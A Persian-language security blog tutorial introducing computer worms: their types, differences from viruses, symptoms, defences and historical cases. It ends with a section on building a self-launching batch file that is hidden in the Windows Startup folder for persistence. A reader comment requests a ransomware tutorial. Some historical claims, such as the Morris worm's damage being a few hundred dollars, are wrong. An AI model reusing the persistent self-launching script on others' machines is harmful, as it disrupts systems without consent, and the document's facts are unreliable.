کرم کامپیوتر (Computer Worm)

کرم کامپیوتر

در این اموزش با کرم کامپیوتر و کرم های اینترنتی اشنا خواهید شد، با ما در ادامه این اموزش همراه باشید.

کرم کامپیوتر و کرم های اینترنتی

کثر بدافزارها برای ورود به سیستم شما، نیاز به ایمیل، صفحات وب و… دارند که اگر شما آن ایمیل را باز کنید یا در صفحه وب بر روی لینکی از فایل های الوده کلیک کنید، می‌­توانند به سیستم نفوذ کنند. اما کرم ها متفاوت اند. کرم ها، یکی از بدافزار های خطرناک هستند که به سادگی باعث خرابی و آسیب می­‌شوند. با ما همراه باشید تا همه چیز درباره کرم های رایانه ای را بدانید.

کرم اینترنتی چیست؟

کرم رایانه ای، نوعی بدافزار است که به عنوان یک برنامه­ ی خود محور عمل می‌­کند؛ یعنی از طریق خودش گسترش پیدا می­‌کند و نیاز به انتقال فیزیکی(مانند فلش، CD و…) ندارد. آن ها به سرعت تکثیر و در سطح شبکه پخش می‌­شوند.

کرم ها، برای سواستفاده از سیستم با استفاده از خرابی های امنیتی سیستم عامل طراحی شده اند و تعداد کمی از این کرم ها، سعی در تغییر تنظیمات سیستم دارند.

زمانی که کرم در سیستم میزبان مستقر شود، تا جایی که امکان دارد از خود کپی ایجاد می­‌کند، بدون اینکه سعی کنند آسیبی به فایل های شما بزند. بله، درست است! آسیبی به فایل ها و سیستم شما نمی­رساند پس چگونه یک بدافزار است؟

  • کرم کامپیوتر، از طریق شبکه قابل تکثیر است و زمانی که شروع به فعالیت در شبکه کند، از سخت افزار و پهنای باند شبکه استفاده می‌­کند که باعث مختل شدن شبکه می‌­شود.
  • کرم رایانه ای، بدون کمک خارجی در سراسر شبکه پخش می­‌شود و نیاز به فعال شدن ندارد.
  • کرم رایانه ای می‌­تواند برنامه های مخرب دیگری را حمل کند. جایی که خطر واقعی نهفته است!
کرم کامپیوتر (Computer Worm)
کرم کامپیوتر و تکثیر ان در شبکه

انواع کرم رایانه ای

  1. Email Worms: کرم ایمیل، همانطور که از اسمش پیداست، بدافزاری است که از طریق ایمیل گسترش پیدا می­‌کند. زمانی که وارد سیستم قربانی می‌­شود، خودش را برای همه افراد در لیست مخاطب ایمیل قربانی ارسال می­‌کند، سپس مخاطبین آن‌ها و این روند ادامه پیدا می‌­کند.
  2. Internet Messaging Worms: این نوع کرم، به جای استفاده از ایمیل، از پیام رسان هایی مانند اسکایپ، واتس اپ و… استفاده می‌­کند تا پیامی حاوی خودش برای مخاطبین ارسال کند. سریع تر از کرم ایمیل عمل می‌­کند.
  3. File sharing Worms: این نوع از کرم ها، به عنوان فایل های رسانه ای با پسوند های دوگانه قابل تکثیر اند. پس برای دانلود فایل های مختلف مانند فیلم، موسیقی و… از سایت های معتبر استفاده کنید و همچنین قابلیت دیدن پسوند (فرمت) در ویندوز را فعال کنید.
  4. Internet Worms) Network Worms): هدف این کرم ها، سایت هایی است که از امنیت کمتری برخوردار هستند و پس از آلوده کردن آن سایت ها، به سیستم قربانیان نفوذ می‌­کنند. کرم های اینترنتی برای تکثیر، از اینترنت استفاده می­‌کنند و به سادگی در کل یک شبکه گسترش پیدا می‌­کنند.

برای یادگیری بیشتر اموزش هک و امنیت می توانید پن تست کور را دنبال کنید.

  انتی ویروس سایت برای اسکن اطلاعات

تفاوت کرم و ویروس

ویروس برای آسیب رساندن به سیستم هدف طراحی شده است. در ایمیل ها، فایل های اجرایی و… پنهان می‌­شود و زمانی که میزبان بر روی آن کلیک کند، اجرا می‌شود. پس از اجرا و فعال سازی، شروع به خراب کردن فایل ها و داده های شما می‌­کند.

کرم، غالبا یک هدف دارد: تکثیر و گسترش! از طریق اینترنت و شبکه وارد سیستم می­‌شود و پس از جای گرفتن در سیستم میزبان شروع به گسترش می‌­کند؛ بدون آنکه مطلع شوید. دست به هیچ خرابکاری نمیزند اما تکثیر شدن آن در مقیاس بالا باعث مختل شدن عملکرد رایانه می‌­شود.

کرم کامپیوتر (Computer Worm)
تفاوت ویروس و کرم

ممکن است سیستم ما دچار کرم های رایانه ای شده باشد؟

تشخیص اینکه کامپیوتر شما کرم داشته باشد، کمی مشکل است اما موارد زیر را  بررسی کنید:

  • کامپیوترتان کند عمل می‌کند؟

اگر فکر می‌کنید کامپیوترتان کند شده است و یا شبکه دارای مشکل است، ممکن است در پس زمینه سیستم عامل کرم های خرابکار وجود داشته باشند و باعث کم شدن پهنای باند سیستم شده باشند.

  • کامپیوترتان عجیب رفتار می‌کند؟

اگر در حین استفاده از سیستم پیام خطای غیر معمول، نمادهای عجیب، فایل های جدید و یا فایل های حذف شده را مشاهده کردید، ممکن است که فعالیت های یک کرم باشد.

  • مخاطبین از شما می‌پرسند، چه اتفاقی افتاده است؟

اگر از طرف شما به مخاطبینتان، ایمیل یا پیامی در قالب پیام رسان های مختلف ارسال شده است، بدانید که کار کرم است و سریعا اقدام به رفع آلودگی کنید.

  • فضای ذخیره سازی سیستمتان کم شده است؟

کرم ها برای گسترش و تکثیر، از خود کپی ایجاد می‌کنند و این عمل نیاز به فضای ذخیره سازی دارد. اگر مشاهده کردید که فضای ذخیره سازی سیستم کمتر شده است، نشان دهنده فعالیت یک کرم در کامپیوتر شما است. اما به طور کلی اغلب نیاز به فاضای زیادی ندارند.

کرم کامپیوتر (Computer Worm)
مقابله با کرم های کامپیوتری

مقابله در برابر کرم های اینترنتی و کمپیوتری

  1. نرم افزارهای خود را به صورت مرتب آپدیت کنید.

روش پخش بسیاری از کرم ها، استفاده از آسیب پذیری های امنیتی در سیستم عامل است؛ پس سعی کنید همیشه سیستم عامل و نرم افزارهای خود را بروز کنید.

  1. رفتار ایمن در اینترنت را تمرین کنید.

تعداد کمی از کرم ها از روش های زیر، قابل تکثیر هستند. اما بهتر است محتاط عمل کنید. کارهای زیر را انجام ندهید:

پیوست ایمیل های ناشناس را بارگیری نکنید مگر آنکه مطمئن شوید از طرف چه کسی است.

از دانلود و نصب نرم افزارهای رایگان غیرقابل اعتماد در بازار خودداری کنید.

بر روی تبلیغات های نامعتبر کلیک نکنید.

لینک ها و پیوندهای عجیب غریب را نادیده بگیرید.

  1. نصب آنتی ویروس و برنامه های امنیتی

کرم ها بدون اطلاع شما، در کامپیوتر و سیستم حرکت می‌کنند. داشتن یک آنتی ویروس خوب و قوی، می‌­توانید از ورود آن‌ها جلوگیری کنید.

چند نمونه از کرم های رایانه ای

  1. The Morris Worm: اولین کرم کامپیوتر، کرم موریس بود که در سال 1988 توسط رابرت موریس طراحی و نوشته شد. او برای کشف بزرگی اینترنت، چندین هزار خط کد را نوشت. مشکلات موجود در کد های کرم، باعث شد تا کرم بتواند چندین بار کامپیوترهای میزبان را آلوده کند. این کرم باعث ضرر مالی چند صد دلاری شد.
  2. I LOVE YOU: پیامی الکترونیکی به نام I LOVE YOU در سال 2000 از فیلیپین پخش شد. به ظاهر فایل متنی بی ضرر بود اما با باز شدن در سیستم قربانی، باعث آلوده شدن و همچنین تغییرات مخرب شد. ضرر مالی این کرم میلیاردها دلار شد.
  3. SQL Slammer: در سال 2003 به سرعت نور در شبکه و اینترنت گسترش یافت. این کرم برای توزیع، از روش های سنتی استفاده نمی­‌کرد؛ در عوض آدرس های IP تصادفی ایجاد می­‌کرد و به امید اینکه توسط آنتی ویروس شناسایی نشود، وارد سیستم قربانیان شد. در این حمله بیش از 75000 کامپیوتر آلوده شد.
  نفوذ از طریق تیم ویور TeamViewer

ساخت یک کرم ساده

برای نوشتن یک کرم بر روی سیستم خود، ابتدا با اکانت ادمین وارد شوید. سپس در درایو C پوشه ای با نام Programs ایجاد کنید. حال در یک ویرایشگر متنی مانند notepad دستورات زیر را بنویسید.

@echo off

Copy C:\Programs\virus.bat C:\Programs

Start C:\Programs\virus.bat

حال فایل را با نام virus و پسوند bat، Save as کنید و مطمئن شوید که گزینه Save as type را بر روی All type قرار داده اید.

اگر می‌خواهید با بوت شدن سیستم عامل، کرم از خودش کپی ایجاد کند مراحل زیر را اجرا کنید.

یک shortcut از فایل virus ایجاد کنید.

نکته: اگر با ویروس نویسی اشنا نیستید می توانید اموزش ان را در پن تست کور مشاهده کنید.

حال از فایل shortcut کپی بگیرید و در پوشه startup پیست کنید.

نکته: پوشه startup را در All programs سرچ کنید.

پس از paste کردن بر روی فایل کلیک راست کنید و گزینه Properties را انتخاب کنید و تیک گزینه Hidden را بزنید.

با ریستارت کردن سیستم و بالا آمدن ویندوز شاهد تکثیر شدن این کرم هستید.

برای حذف کردن آن کافی است پوشه Programs را که در درایو C ساختید، پاک کنید.

نتیجه

کرم کامپیوتر به خودی خود، کپی می‌­شود و نیاز به دخالت در فعال سازی ندارد. این بدافزار، از طریق مشکلات امنیتی سیستم عامل سعی در ورود به سیستم دارد. کرم کامپیوتر اگر به تنهایی وارد سیستم شما شود، با کپی هایی که از خود ایجاد می­‌کند باعث مختل شدن سیستم، شبکه و کم شدن سرعت اینترنت می­‌شود. اما در برخی حالات، ممکن است حاوی ویروس و بدافزاری دیگر هم باشد که یک هکر از آن برای ورود به سیستم قربانی استفاده می­کند.

البته شرکت ها و هکرهای اخلاقی وجود دارند که با استفاده از کرم های کامپیوتر، اقدام به تست نفوذ در سیستم عامل های مختلف می­‌کنند تا صاحبان سیستم عامل ها از رخنه های امنیتی موجود مطلع شوند.

برای جلوگیری از ورود این ویروس ها بهترین راه حل نصب آنتی ویروس قوی است؛ همچنین با به روز رسانی دائم نرم افزارها و سیستم عامل، از عوامل امنیتی جدی برخوردار شوید.

4/5 (1 نظر)

نیما حسینی هستم بنیان گذار تیم پن تست کور و مدرس دوره های تست نفوذ و امنیت ، در 5 سال گذشته متمرکز بر مباحث روز هک و امنیت بوده ام و بعد از کسب دانش و تجربه های ارزشمند تصمیم بر به اشتراک گذاری نتیجه ان ها با دیگران گرفته ام.

مطالب مرتبط

ابزار SSLScan

ابزار SSLScan و برسی SSL وب سایت

در این آموزش به ابزار SSLScan جهت بررسی امنیتی SSL وب سایت ها می پردازیم، در ادامه در ادامه این آموزش با ما همراه باشید. 0/5 (0 نظر)   هک لاراول با استخراج فایل .env

اسکن سریع اسیب پذیری

اسکن سریع اسیب پذیری با CRLFuzz

در این آموزش با نحوه اسکن سریع اسیب پذیری ها با استفاده از ابزار CRLFuzz آشنا خواهید شد، با ما در ادامه این آموزش هک و امنیت همراه باشید. 0/5 (0 نظر)   هک لاراول با استخراج فایل .env

انواع هک

انواع هک و هکر ها

در این اموزش با انواع هک و انواع هکر ها به صورت کامل اشنا خواهید شد، با ما در ادامه این اموزش همراه باشید. 5/5 (1 نظر)   اموزش فارسی ابزار KatanaFramework

۲ دیدگاه در “کرم کامپیوتر (Computer Worm)”

  • دارک مود شهریور ۱۰, ۱۳۹۹ پاسخ

    جالب و مفید بود لطفا آموزش ساخت باج افزار رو درست کنید.

    • نیما حسینی شهریور ۱۴, ۱۳۹۹ پاسخ

      درود بر شما
      در صورت امکان قرار می گیرد.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *